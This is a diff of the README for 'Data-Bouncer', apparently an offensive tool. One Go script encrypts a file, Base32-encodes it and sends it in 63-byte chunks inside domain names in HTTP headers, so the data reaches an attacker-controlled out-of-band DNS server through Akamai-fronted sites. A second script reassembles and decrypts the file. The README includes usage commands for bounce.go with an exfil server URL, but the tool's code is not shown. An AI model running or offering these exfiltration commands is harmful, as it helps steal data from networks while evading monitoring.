BKlaasWerkman/Data-Bouncer/README.md

 One script that encrypts and bounces the data you want to exfiltrate and the other that reassembles and decrypts it.

-You will need an OOB dns server under you're control for this to work and collect the data.
+You will need an OOB dns server under your control for this to work and to collect the data.
 Here I'm using https://github.com/projectdiscovery/interactsh

 From my testing this should work on most websites/domains that touches Akamai.

 ### Bounce.go
 This script reads your chosen domain names from domains.txt.
-First encrypts your chosen file using a password you provide, encodes the file into Base32 and finally splits it into 63 byte chunks and sends them as part of a domain name in an HTTP header.
+It first encrypts your chosen file using a password you provide, encodes the file into Base32 and finally splits it into 63 byte chunks and sends them as part of a domain name in an HTTP header.

 Example:
 ```
-go run bounce.go -f <filename> -p <password> -u <UUID> -e <interact server url> -v
+go run bounce.go -f <filename> -p <password> -u <UUID> -e <exfil server url> -v
 ```
 ```
-.\bounce.exe -f <filename> -p <password> -u <UUID> -e <interact server url> -v
+.\bounce.exe -f <filename> -p <password> -u <UUID> -e <exfil server url> -v
 ```

 ### Regenerate.go
-This script reads the JSON output from your interactsh exfil server, processes and reassembles the chunks and does the reverse of decoding, decrypting, and finally outputting the file.
+This script reads the JSON export from your interactsh exfil server, processes and reassembles the chunks, doing the reverse by decoding, decrypting, and finally outputting the file.

 Example:
 ```